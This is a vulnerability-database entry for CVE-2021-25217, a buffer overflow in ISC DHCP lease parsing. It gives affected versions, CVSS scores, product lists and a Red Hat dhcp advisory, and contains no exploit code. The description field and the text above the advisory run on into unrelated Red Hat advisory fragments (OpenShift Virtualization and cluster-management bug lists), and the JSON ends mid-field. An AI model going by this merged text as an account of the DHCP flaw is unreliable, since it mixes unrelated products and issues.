Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
53 vulnerabilities found for dhcp by isc
VAR-202105-1325
Vulnerability from variot - Updated: 2026-04-10 22:10In ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16, ISC DHCP 4.4.0 -> 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), The outcome of encountering the defect while reading a lease that will trigger it varies, according to: the component being affected (i.e., dhclient or dhcpd) whether the package was built as a 32-bit or 64-bit binary whether the compiler flag -fstack-protection-strong was used when compiling In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process. In dhcpd, when run in DHCPv4 or DHCPv6 mode: if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted. if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted. ISC (Internet Systems Consortium) Provided by ISC DHCP contains a buffer overflow vulnerability. ISC DHCP contains a buffer overflow vulnerability due to a discrepancy between the processing of optional information encapsulated within network packets and information stored on disk. There is a discrepancy between the code that handles encapsulated option information in leases transmitted "on the wire" and the code which reads and parses lease information after it has been written to disk storage. The highest threat from this vulnerability is to data confidentiality and integrity as well as service availability. (CVE-2021-25217). Description:
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. Bugs fixed (https://bugzilla.redhat.com/):
1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve 1945703 - "Guest OS Info" availability in VMI describe is flaky 1958816 - [2.6.z] KubeMacPool fails to start due to OOM likely caused by a high number of Pods running in the cluster 1963275 - migration controller null pointer dereference 1965099 - Live Migration double handoff to virt-handler causes connection failures 1965181 - CDI importer doesn't report AwaitingVDDK like it used to 1967086 - Cloning DataVolumes between namespaces fails while creating cdi-upload pod 1967887 - [2.6.6] nmstate is not progressing on a node and not configuring vlan filtering that causes an outage for VMs 1969756 - Windows VMs fail to start on air-gapped environments 1970372 - Virt-handler fails to verify container-disk 1973227 - segfault in virt-controller during pdb deletion 1974084 - 2.6.6 containers 1975212 - No Virtual Machine Templates Found [EDIT - all templates are marked as depracted] 1975727 - [Regression][VMIO][Warm] The third precopy does not end in warm migration 1977756 - [2.6.z] PVC keeps in pending when using hostpath-provisioner 1982760 - [v2v] no kind VirtualMachine is registered for version \"kubevirt.io/v1\" i... 1986989 - OpenShift Virtualization 2.6.z cannot be upgraded to 4.8.0 initially deployed starting with <= 4.8
- Summary:
Red Hat Advanced Cluster Management for Kubernetes 2.3.0 General Availability release images, which fix several bugs and security issues. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.3.0 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana gement_for_kubernetes/2.3/html/release_notes/
Security:
-
fastify-reply-from: crafted URL allows prefix scape of the proxied backend service (CVE-2021-21321)
-
fastify-http-proxy: crafted URL allows prefix scape of the proxied backend service (CVE-2021-21322)
-
nodejs-netmask: improper input validation of octal input data (CVE-2021-28918)
-
redis: Integer overflow via STRALGO LCS command (CVE-2021-29477)
-
redis: Integer overflow via COPY command for large intsets (CVE-2021-29478)
-
nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)
-
nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions (CVE-2020-28500)
-
golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing
-
-u- extension (CVE-2020-28851)
-
golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag (CVE-2020-28852)
-
nodejs-ansi_up: XSS due to insufficient URL sanitization (CVE-2021-3377)
-
oras: zip-slip vulnerability via oras-pull (CVE-2021-21272)
-
redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms (CVE-2021-21309)
-
nodejs-lodash: command injection via template (CVE-2021-23337)
-
nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl() (CVE-2021-23362)
-
browserslist: parsing of invalid queries could result in Regular Expression Denial of Service (ReDoS) (CVE-2021-23364)
-
nodejs-postcss: Regular expression denial of service during source map parsing (CVE-2021-23368)
-
nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option (CVE-2021-23369)
-
nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js (CVE-2021-23382)
-
nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option (CVE-2021-23383)
-
openssl: integer overflow in CipherUpdate (CVE-2021-23840)
-
openssl: NULL pointer dereference in X509_issuer_and_serial_hash() (CVE-2021-23841)
-
nodejs-ua-parser-js: ReDoS via malicious User-Agent header (CVE-2021-27292)
-
grafana: snapshot feature allow an unauthenticated remote attacker to trigger a DoS via a remote API call (CVE-2021-27358)
-
nodejs-is-svg: ReDoS via malicious string (CVE-2021-28092)
-
nodejs-netmask: incorrectly parses an IP address that has octal integer with invalid character (CVE-2021-29418)
-
ulikunitz/xz: Infinite loop in readUvarint allows for denial of service (CVE-2021-29482)
-
normalize-url: ReDoS for data URLs (CVE-2021-33502)
-
nodejs-trim-newlines: ReDoS in .end() method (CVE-2021-33623)
-
nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)
-
html-parse-stringify: Regular Expression DoS (CVE-2021-23346)
-
openssl: incorrect SSLv2 rollback protection (CVE-2021-23839)
For more details about the security issues, including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE pages listed in the References section.
Bugs:
-
RFE Make the source code for the endpoint-metrics-operator public (BZ# 1913444)
-
cluster became offline after apiserver health check (BZ# 1942589)
-
Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1913333 - CVE-2020-28851 golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension 1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag 1913444 - RFE Make the source code for the endpoint-metrics-operator public 1921286 - CVE-2021-21272 oras: zip-slip vulnerability via oras-pull 1927520 - RHACM 2.3.0 images 1928937 - CVE-2021-23337 nodejs-lodash: command injection via template 1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions 1930294 - CVE-2021-23839 openssl: incorrect SSLv2 rollback protection 1930310 - CVE-2021-23841 openssl: NULL pointer dereference in X509_issuer_and_serial_hash() 1930324 - CVE-2021-23840 openssl: integer overflow in CipherUpdate 1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms 1936427 - CVE-2021-3377 nodejs-ansi_up: XSS due to insufficient URL sanitization 1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string 1940196 - View Resource YAML option shows 404 error when reviewing a Subscription for an application 1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header 1941024 - CVE-2021-27358 grafana: snapshot feature allow an unauthenticated remote attacker to trigger a DoS via a remote API call 1941675 - CVE-2021-23346 html-parse-stringify: Regular Expression DoS 1942178 - CVE-2021-21321 fastify-reply-from: crafted URL allows prefix scape of the proxied backend service 1942182 - CVE-2021-21322 fastify-http-proxy: crafted URL allows prefix scape of the proxied backend service 1942589 - cluster became offline after apiserver health check 1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl() 1944822 - CVE-2021-29418 nodejs-netmask: incorrectly parses an IP address that has octal integer with invalid character 1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data 1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service 1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option 1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing 1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js 1954368 - CVE-2021-29482 ulikunitz/xz: Infinite loop in readUvarint allows for denial of service 1955619 - CVE-2021-23364 browserslist: parsing of invalid queries could result in Regular Expression Denial of Service (ReDoS) 1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option 1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe 1957410 - CVE-2021-29477 redis: Integer overflow via STRALGO LCS command 1957414 - CVE-2021-29478 redis: Integer overflow via COPY command for large intsets 1964461 - CVE-2021-33502 normalize-url: ReDoS for data URLs 1966615 - CVE-2021-33623 nodejs-trim-newlines: ReDoS in .end() method 1968122 - clusterdeployment fails because hiveadmission sc does not have correct permissions 1972703 - Subctl fails to join cluster, since it cannot auto-generate a valid cluster id 1983131 - Defragmenting an etcd member doesn't reduce the DB size (7.5GB) on a setup with ~1000 spoke clusters
-
8.1) - aarch64, noarch, ppc64le, s390x, x86_64
-
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: dhcp security update Advisory ID: RHSA-2021:2357-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:2357 Issue date: 2021-06-09 CVE Names: CVE-2021-25217 ==================================================================== 1. Summary:
An update for dhcp is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. The dhcp packages provide a relay agent and ISC DHCP service required to enable and administer DHCP on a network.
Security Fix(es):
- dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient (CVE-2021-25217)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1963258 - CVE-2021-25217 dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: dhcp-4.2.5-83.el7_9.1.src.rpm
x86_64: dhclient-4.2.5-83.el7_9.1.x86_64.rpm dhcp-common-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-libs-4.2.5-83.el7_9.1.i686.rpm dhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: dhcp-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-devel-4.2.5-83.el7_9.1.i686.rpm dhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: dhcp-4.2.5-83.el7_9.1.src.rpm
x86_64: dhclient-4.2.5-83.el7_9.1.x86_64.rpm dhcp-common-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-libs-4.2.5-83.el7_9.1.i686.rpm dhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: dhcp-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-devel-4.2.5-83.el7_9.1.i686.rpm dhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: dhcp-4.2.5-83.el7_9.1.src.rpm
ppc64: dhclient-4.2.5-83.el7_9.1.ppc64.rpm dhcp-4.2.5-83.el7_9.1.ppc64.rpm dhcp-common-4.2.5-83.el7_9.1.ppc64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.ppc.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.ppc64.rpm dhcp-libs-4.2.5-83.el7_9.1.ppc.rpm dhcp-libs-4.2.5-83.el7_9.1.ppc64.rpm
ppc64le: dhclient-4.2.5-83.el7_9.1.ppc64le.rpm dhcp-4.2.5-83.el7_9.1.ppc64le.rpm dhcp-common-4.2.5-83.el7_9.1.ppc64le.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.ppc64le.rpm dhcp-libs-4.2.5-83.el7_9.1.ppc64le.rpm
s390x: dhclient-4.2.5-83.el7_9.1.s390x.rpm dhcp-4.2.5-83.el7_9.1.s390x.rpm dhcp-common-4.2.5-83.el7_9.1.s390x.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.s390.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.s390x.rpm dhcp-libs-4.2.5-83.el7_9.1.s390.rpm dhcp-libs-4.2.5-83.el7_9.1.s390x.rpm
x86_64: dhclient-4.2.5-83.el7_9.1.x86_64.rpm dhcp-4.2.5-83.el7_9.1.x86_64.rpm dhcp-common-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-libs-4.2.5-83.el7_9.1.i686.rpm dhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: dhcp-debuginfo-4.2.5-83.el7_9.1.ppc.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.ppc64.rpm dhcp-devel-4.2.5-83.el7_9.1.ppc.rpm dhcp-devel-4.2.5-83.el7_9.1.ppc64.rpm
ppc64le: dhcp-debuginfo-4.2.5-83.el7_9.1.ppc64le.rpm dhcp-devel-4.2.5-83.el7_9.1.ppc64le.rpm
s390x: dhcp-debuginfo-4.2.5-83.el7_9.1.s390.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.s390x.rpm dhcp-devel-4.2.5-83.el7_9.1.s390.rpm dhcp-devel-4.2.5-83.el7_9.1.s390x.rpm
x86_64: dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-devel-4.2.5-83.el7_9.1.i686.rpm dhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: dhcp-4.2.5-83.el7_9.1.src.rpm
x86_64: dhclient-4.2.5-83.el7_9.1.x86_64.rpm dhcp-4.2.5-83.el7_9.1.x86_64.rpm dhcp-common-4.2.5-83.el7_9.1.x86_64.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-libs-4.2.5-83.el7_9.1.i686.rpm dhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: dhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm dhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm dhcp-devel-4.2.5-83.el7_9.1.i686.rpm dhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2021-25217 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYMCeytzjgjWX9erEAQgPYw/+K6NTT5tvNy0WHRy46UioFuzIbxlMOPzm zXmk61B2Dgod7DCU3EbF9u7nSViaQds11pDCrTejH70WrqNQSaWMhsASgtNmQ42q 0oVWQwqyB8mP/73BwYJQ84eZDGwsyqQf/9MO96g4c0jlZOAu9vSxvSflQ4DY8m9L 0+pk3/zHOsUz3Za7Ns/1wa8pmq3hxAt0z6Z6ri0Ka8CEHg7W7ELGC67ih1BOcpP5 mdWOSfTW+F1EzmerDW0eom09R/Ndfo/FdGeCbEq1K6kvcrPy4e/tsyBCquPYPFar aTADxJPMObDTY0dJhqw1qZ5cERLnhJaj8GzWc0Ne2KIAFig/NcVhEZL8RtvrNWhO JIaVZ7zK6bi1VASVVIAP8yQzwdZFEbfMREOa705gMvXMz1Ux08YvsbrelD/LeJXe 45C2+zGvM7KDd/AlrhopZPbBJI07tbNe8qWzFggJtBTMVg28i5K7DjFjvASFZFrV 8nKdWae1GOEtH23fygGOoW4m0KkGWd1Tc/lte6Wy788KOa/yF3IQkWeTSo5KG33Q UHCzx6NzHyeAgW7K9QvvpIjfbxIAyBbebsIkhOhySjfsAp28lKkaZZRVF/sNWIvG GRibEMi366KUTR5AiTMAjHoYgIDzp7nywWiYBhf9SuNgqV3kG0Yz7fd1ac0+qcH5 zPKanVJNoQs=9+pl -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "sinec ins",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "ruggedcom rox rx1501",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.15.0"
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ruggedcom rox rx1512",
"scope": "gte",
"trust": 1.0,
"vendor": "siemens",
"version": "2.3.0"
},
{
"_id": null,
"model": "ruggedcom rox rx1500",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.15.0"
},
{
"_id": null,
"model": "ruggedcom rox mx5000",
"scope": "gte",
"trust": 1.0,
"vendor": "siemens",
"version": "2.3.0"
},
{
"_id": null,
"model": "solidfire \\\u0026 hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "dhcp",
"scope": "lte",
"trust": 1.0,
"vendor": "isc",
"version": "4.4.2"
},
{
"_id": null,
"model": "ruggedcom rox rx1500",
"scope": "gte",
"trust": 1.0,
"vendor": "siemens",
"version": "2.3.0"
},
{
"_id": null,
"model": "ruggedcom rox rx1400",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.15.0"
},
{
"_id": null,
"model": "ruggedcom rox rx5000",
"scope": "gte",
"trust": 1.0,
"vendor": "siemens",
"version": "2.3.0"
},
{
"_id": null,
"model": "ruggedcom rox rx1510",
"scope": "gte",
"trust": 1.0,
"vendor": "siemens",
"version": "2.3.0"
},
{
"_id": null,
"model": "ruggedcom rox rx1511",
"scope": "gte",
"trust": 1.0,
"vendor": "siemens",
"version": "2.3.0"
},
{
"_id": null,
"model": "ruggedcom rox rx1501",
"scope": "gte",
"trust": 1.0,
"vendor": "siemens",
"version": "2.3.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "ruggedcom rox rx5000",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.15.0"
},
{
"_id": null,
"model": "sinec ins",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0"
},
{
"_id": null,
"model": "ruggedcom rox rx1511",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.15.0"
},
{
"_id": null,
"model": "ruggedcom rox mx5000",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.15.0"
},
{
"_id": null,
"model": "ruggedcom rox rx1536",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.15.0"
},
{
"_id": null,
"model": "dhcp",
"scope": "gte",
"trust": 1.0,
"vendor": "isc",
"version": "4.4.0"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 1.0,
"vendor": "isc",
"version": "4.1-esv"
},
{
"_id": null,
"model": "ruggedcom rox rx1512",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.15.0"
},
{
"_id": null,
"model": "ruggedcom rox rx1510",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.15.0"
},
{
"_id": null,
"model": "ruggedcom rox rx1524",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2.15.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 0.8,
"vendor": "isc",
"version": "4.4.0 to 4.4.2"
},
{
"_id": null,
"model": "dhcp",
"scope": null,
"trust": 0.8,
"vendor": "isc",
"version": null
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 0.8,
"vendor": "isc",
"version": "4.1-esv-r1 to 4.1-esv-r16"
},
{
"_id": null,
"model": "dhcp",
"scope": "eq",
"trust": 0.8,
"vendor": "isc",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-001741"
},
{
"db": "NVD",
"id": "CVE-2021-25217"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "163789"
},
{
"db": "PACKETSTORM",
"id": "163747"
},
{
"db": "PACKETSTORM",
"id": "163196"
},
{
"db": "PACKETSTORM",
"id": "163155"
},
{
"db": "PACKETSTORM",
"id": "163144"
},
{
"db": "PACKETSTORM",
"id": "163145"
},
{
"db": "PACKETSTORM",
"id": "163051"
}
],
"trust": 0.7
},
"cve": "CVE-2021-25217",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 3.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"id": "CVE-2021-25217",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.1,
"vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2021-25217",
"impactScore": 4.0,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "IPA",
"availabilityImpact": "High",
"baseScore": 7.4,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2021-001741",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "IPA",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2021-001741",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-25217",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "security-officer@isc.org",
"id": "CVE-2021-25217",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "IPA",
"id": "JVNDB-2021-001741",
"trust": 0.8,
"value": "High"
},
{
"author": "IPA",
"id": "JVNDB-2021-001741",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202105-1759",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-25217",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25217"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1759"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-001741"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-001741"
},
{
"db": "NVD",
"id": "CVE-2021-25217"
},
{
"db": "NVD",
"id": "CVE-2021-25217"
}
]
},
"description": {
"_id": null,
"data": "In ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16, ISC DHCP 4.4.0 -\u003e 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), The outcome of encountering the defect while reading a lease that will trigger it varies, according to: the component being affected (i.e., dhclient or dhcpd) whether the package was built as a 32-bit or 64-bit binary whether the compiler flag -fstack-protection-strong was used when compiling In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process. In dhcpd, when run in DHCPv4 or DHCPv6 mode: if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted. if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted. ISC (Internet Systems Consortium) Provided by ISC DHCP contains a buffer overflow vulnerability. ISC DHCP contains a buffer overflow vulnerability due to a discrepancy between the processing of optional information encapsulated within network packets and information stored on disk. There is a discrepancy between the code that handles encapsulated option information in leases transmitted \"on the wire\" and the code which reads and parses lease information after it has been written to disk storage. The highest threat from this vulnerability is to data confidentiality and integrity as well as service availability. (CVE-2021-25217). Description:\n\nOpenShift Virtualization is Red Hat\u0027s virtualization solution designed for\nRed Hat OpenShift Container Platform. Bugs fixed (https://bugzilla.redhat.com/):\n\n1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve\n1945703 - \"Guest OS Info\" availability in VMI describe is flaky\n1958816 - [2.6.z] KubeMacPool fails to start due to OOM likely caused by a high number of Pods running in the cluster\n1963275 - migration controller null pointer dereference\n1965099 - Live Migration double handoff to virt-handler causes connection failures\n1965181 - CDI importer doesn\u0027t report AwaitingVDDK like it used to\n1967086 - Cloning DataVolumes between namespaces fails while creating cdi-upload pod\n1967887 - [2.6.6] nmstate is not progressing on a node and not configuring vlan filtering that causes an outage for VMs\n1969756 - Windows VMs fail to start on air-gapped environments\n1970372 - Virt-handler fails to verify container-disk\n1973227 - segfault in virt-controller during pdb deletion\n1974084 - 2.6.6 containers\n1975212 - No Virtual Machine Templates Found [EDIT - all templates are marked as depracted]\n1975727 - [Regression][VMIO][Warm] The third precopy does not end in warm migration\n1977756 - [2.6.z] PVC keeps in pending when using hostpath-provisioner\n1982760 - [v2v] no kind VirtualMachine is registered for version \\\"kubevirt.io/v1\\\" i... \n1986989 - OpenShift Virtualization 2.6.z cannot be upgraded to 4.8.0 initially deployed starting with \u003c= 4.8\n\n5. Summary:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.0 General\nAvailability release images, which fix several bugs and security issues. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.0 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and 